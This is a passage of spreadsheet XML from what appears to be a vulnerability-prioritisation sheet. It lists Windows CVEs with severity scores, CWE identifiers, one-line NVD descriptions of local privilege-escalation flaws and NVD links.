          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t>
        </is>
      </c>
    </row>
    <row r="3418">
      <c r="A3418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69470</t>
        </is>
      </c>
      <c r="C3418" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3418" s="5" t="inlineStr"/>
      <c r="F3418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3418" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3418" s="5" t="inlineStr"/>
      <c r="I3418" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3418" s="5" t="inlineStr"/>
      <c r="K3418" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3418" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t>
        </is>
      </c>
    </row>
    <row r="3419">
      <c r="A3419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69472</t>
        </is>
      </c>
      <c r="C3419" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3419" s="5" t="inlineStr"/>
      <c r="F3419" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3419" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3419" s="5" t="inlineStr"/>
      <c r="I3419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3419" s="5" t="inlineStr"/>
      <c r="K3419" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3419" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t>
        </is>
      </c>
    </row>
    <row r="3420">
      <c r="A3420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="C3420" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3420" s="5" t="inlineStr"/>
      <c r="F3420" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3420" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3420" s="5" t="inlineStr"/>
      <c r="I3420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3420" s="5" t="inlineStr"/>
      <c r="K3420" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3420" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="3421">
      <c r="A3421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69488</t>
        </is>
      </c>
      <c r="C3421" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3421" s="5" t="inlineStr"/>
      <c r="F3421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3421" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3421" s="5" t="inlineStr"/>
      <c r="I3421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3421" s="5" t="inlineStr"/>
      <c r="K3421" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3421" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t>
        </is>
      </c>
    </row>
    <row r="3422">
      <c r="A3422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69492</t>
        </is>
      </c>
      <c r="C3422" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3422" s="5" t="inlineStr"/>
      <c r="F3422" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3422" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3422" s="5" t="inlineStr"/>
      <c r="I3422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3422" s="5" t="inlineStr"/>
      <c r="K3422" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3422" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t>
        </is>
      </c>
    </row>
    <row r="3423">
      <c r="A3423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69498</t>
        </is>
      </c>
      <c r="C3423" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3423" s="5" t="inlineStr"/>
      <c r="F3423" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3423" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3423" s="5" t="inlineStr"/>
      <c r="I3423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3423" s="5" t="inlineStr"/>
      <c r="K3423" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3423" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t>
        </is>
      </c>
    </row>
    <row r="3424">
      <c r="A3424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69500</t>
        </is>
      </c>
      <c r="C3424" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3424" s="5" t="inlineStr"/>
      <c r="F3424" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3424" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3424" s="5" t="inlineStr"/>
      <c r="I3424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3424" s="5" t="inlineStr"/>
      <c r="K3424" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3424" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t>
        </is>
      </c>
    </row>
    <row r="3425">
      <c r="A3425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="C3425" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3425" s="5" t="inlineStr"/>
      <c r="F3425" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3425" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3425" s="5" t="inlineStr"/>
      <c r="I3425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3425" s="5" t="inlineStr"/>
      <c r="K3425" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L3425" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="3426">
      <c r="A3426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69516</t>
        </is>
      </c>
      <c r="C3426" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3426" s="5" t="inlineStr"/>
      <c r="F3426" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3426" s="5" t="inlineStr"/>
      <c r="H3426" s="5" t="inlineStr"/>
      <c r="I3426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3426" s="5" t="inlineStr"/>
      <c r="K3426" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3426" s="5" t="inlineStr">
        <is>
          <t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t>
        </is>
      </c>
    </row>
    <row r="3427">
      <c r="A3427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69517</t>
        </is>
      </c>
      <c r="C3427" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3427" s="5" t="inlineStr"/>
      <c r="F3427" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3427" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3427" s="5" t="inlineStr"/>
      <c r="I3427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3427" s="5" t="inlineStr"/>
      <c r="K3427" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3427" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t>
        </is>
      </c>
    </row>
    <row r="3428">
      <c r="A3428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69540</t>
        </is>
      </c>
      <c r="C3428" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3428" s="5" t="inlineStr"/>
      <c r="F3428" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3428" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3428" s="5" t="inlineStr"/>
      <c r="I3428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3428" s="5" t="inlineStr"/>
      <c r="K3428" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3428" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t>
        </is>
      </c>
    </row>
    <row r="3429">
      <c r="A3429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69549</t>
        </is>
      </c>
      <c r="C3429" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3429" s="5" t="inlineStr"/>
      <c r="F3429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3429" s="5" t="inlineStr"/>
      <c r="H3429" s="5" t="inlineStr"/>
      <c r="I3429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3429" s="5" t="inlineStr"/>
      <c r="K3429" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="L3429" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t>
        </is>
      </c>
    </row>
    <row r="3430">
      <c r="A3430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69560</t>
        </is>
      </c>
      <c r="C3430" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3430" s="5" t="inlineStr"/>
      <c r="F3430" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3430" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3430" s="5" t="inlineStr"/>
      <c r="I3430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3430" s="5" t="inlineStr"/>
      <c r="K3430" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3430" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t>
        </is>
      </c>
    </row>
    <row r="3431">
      <c r="A3431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69563</t>
        </is>
      </c>
      <c r="C3431" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3431" s="5" t="inlineStr"/>
      <c r="F3431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3431" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3431" s="5" t="inlineStr"/>
      <c r="I3431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3431" s="5" t="inlineStr"/>
      <c r="K3431" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-367</t>
        </is>
      </c>
      <c r="L3431" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t>
        </is>
      </c>
    </row>
    <row r="3432">
      <c r="A3432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69564</t>
        </is>
      </c>
      <c r="C3432" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3432" s="5" t="inlineStr"/>
      <c r="F3432" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3432" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3432" s="5" t="inlineStr"/>
      <c r="I3432" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3432" s="5" t="inlineStr"/>
      <c r="K3432" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3432" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t>
        </is>
      </c>
    </row>
    <row r="3433">
      <c r="A3433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="C3433" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3433" s="5" t="inlineStr"/>
      <c r="F3433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3433" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3433" s="5" t="inlineStr"/>
      <c r="I3433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3433" s="5" t="inlineStr"/>
      <c r="K3433" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3433" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="3434">
      <c r="A3434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69573</t>
        </is>
      </c>
      <c r="C3434" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3434" s="5" t="inlineStr"/>
      <c r="F3434" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3434" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3434" s="5" t="inlineStr"/>
      <c r="I3434" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3434" s="5" t="inlineStr"/>
      <c r="K3434" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3434" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t>
        </is>
      </c>
    </row>
    <row r="3435">
      <c r="A3435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69574</t>
        </is>
      </c>
      <c r="C3435" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3435" s="5" t="inlineStr"/>
      <c r="F3435" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3435" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3435" s="5" t="inlineStr"/>
      <c r="I3435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3435" s="5" t="inlineStr"/>
      <c r="K3435" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3435" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t>
        </is>
      </c>
    </row>
    <row r="3436">
      <c r="A3436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69575</t>
        </is>
      </c>
      <c r="C3436" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3436" s="5" t="inlineStr"/>
      <c r="F3436" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3436" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3436" s="5" t="inlineStr"/>
      <c r="I3436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3436" s="5" t="inlineStr"/>
      <c r="K3436" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3436" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t>
        </is>
      </c>
    </row>
    <row r="3437">
      <c r="A3437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="C3437" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3437" s="5" t="inlineStr"/>
      <c r="F3437" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3437" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3437" s="5" t="inlineStr"/>
      <c r="I3437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3437" s="5" t="inlineStr"/>
      <c r="K3437" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L3437" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="3438">
      <c r="A3438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69581</t>
        </is>
      </c>
      <c r="C3438" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3438" s="5" t="inlineStr"/>
      <c r="F3438" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3438" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3438" s="5" t="inlineStr"/>
      <c r="I3438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3438" s="5" t="inlineStr"/>
      <c r="K3438" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3438" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t>
        </is>
      </c>
    </row>
    <row r="3439">
      <c r="A3439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69600</t>
        </is>
      </c>
      <c r="C3439" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3439" s="5" t="inlineStr"/>
      <c r="F3439" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3439" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3439" s="5" t="inlineStr"/>
      <c r="I3439" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3439" s="5" t="inlineStr"/>
      <c r="K3439" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3439" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t>
        </is>
      </c>
    </row>
    <row r="3440">
      <c r="A3440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69605</t>
        </is>
      </c>
      <c r="C3440" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3440" s="5" t="inlineStr"/>
      <c r="F3440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3440" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3440" s="5" t="inlineStr"/>
      <c r="I3440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3440" s="5" t="inlineStr"/>
      <c r="K3440" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3440" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t>
        </is>
      </c>
    </row>
    <row r="3441">
      <c r="A3441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69606</t>
        </is>
      </c>
      <c r="C3441" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3441" s="5" t="inlineStr"/>
      <c r="F3441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3441" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3441" s="5" t="inlineStr"/>
      <c r="I3441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3441" s="5" t="inlineStr"/>
      <c r="K3441" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3441" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t>
        </is>
      </c>
    </row>
    <row r="3442">
      <c r="A3442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69610</t>
        </is>
      </c>
      <c r="C3442" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3442" s="5" t="inlineStr"/>
